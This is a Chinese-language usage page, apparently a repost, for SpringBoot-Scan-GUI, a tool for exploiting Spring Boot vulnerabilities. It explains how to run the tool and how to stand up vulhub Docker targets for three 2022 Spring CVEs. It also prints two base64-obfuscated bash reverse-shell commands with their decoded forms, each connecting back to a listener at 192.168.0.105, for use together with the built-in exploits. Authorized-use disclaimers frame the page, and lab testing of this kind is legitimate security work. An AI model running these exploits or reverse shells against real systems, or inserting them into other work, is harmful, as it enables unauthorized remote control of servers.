本工具仅面向合法授权的企业安全建设行为,如您需要测试本工具的可用性,请自行搭建靶机环境。 在使用本工具进行检测时,您应确保该行为符合当地的法律法规,并且已经取得了足够的授权。请勿对非授权目标进行扫描。 如您在使用本工具的过程中存在任何非法行为,您需自行承担相应后果,我们将不承担任何法律及连带责任。
**SpringBoot Scan GUI | Spring Boot漏洞利用工具说明 - 🔰雨苁ℒ🔰 https://www.ddosi.org/springboot-scan-gui/
**开源工具 [SpringBoot-Scan] https://github.com/AabyssZG/SpringBoot-Scan 的GUI图形化版本,对你有用的话麻烦点个Star哈哈~
**[SpringBoot-Scan] https://github.com/mwb0350/SpringBoot-Scan
注意:本工具内置相关漏洞的Exp,杀软报毒属于正常现象!
python3 SpringBoot-Scan-GUI.py
也可以直接下载执行release打包好的exe程序
python3 SpringBoot-Scan-GUI-Linux.py
或者使用 wine 来执行:
sudo wine SpringBoot-Scan-GUI.exe
git clone https://github.com/vulhub/vulhub.git
sudo apt-get install docker.io
sudo apt install docker-compose
cd /vulhub/CVE-2022-22965
sudo docker-compose up -d
cd /vulhub/CVE-2022-22963
sudo docker-compose up -d
cd /vulhub/CVE-2022-22947
sudo docker-compose up -d
如果报错,自行修改 .yml 文件中映射的端口号
13exp-shell
准备反弹shell:
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTA1Lzg4ODggMD4mMQ==}|{base64,-d}|{bash,-i} || (Base64)
编码内容→ bash -i >& /dev/tcp/192.168.0.105/8888 0>&1
注:云境反弹shell需使用公网服务器
同样准备反弹shell
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTA1Lzg4ODkgMD4mMQ==}|{base64,-d}|{bash,-i} || (Base64)
编码内容→ bash -i >& /dev/tcp/192.168.0.105/8889 0>&1
本工具仅面向合法授权的企业安全建设行为,如您需要测试本工具的可用性,请自行搭建靶机环境。 在使用本工具进行检测时,您应确保该行为符合当地的法律法规,并且已经取得了足够的授权。请勿对非授权目标进行扫描。 如您在使用本工具的过程中存在任何非法行为,您需自行承担相应后果,我们将不承担任何法律及连带责任。





















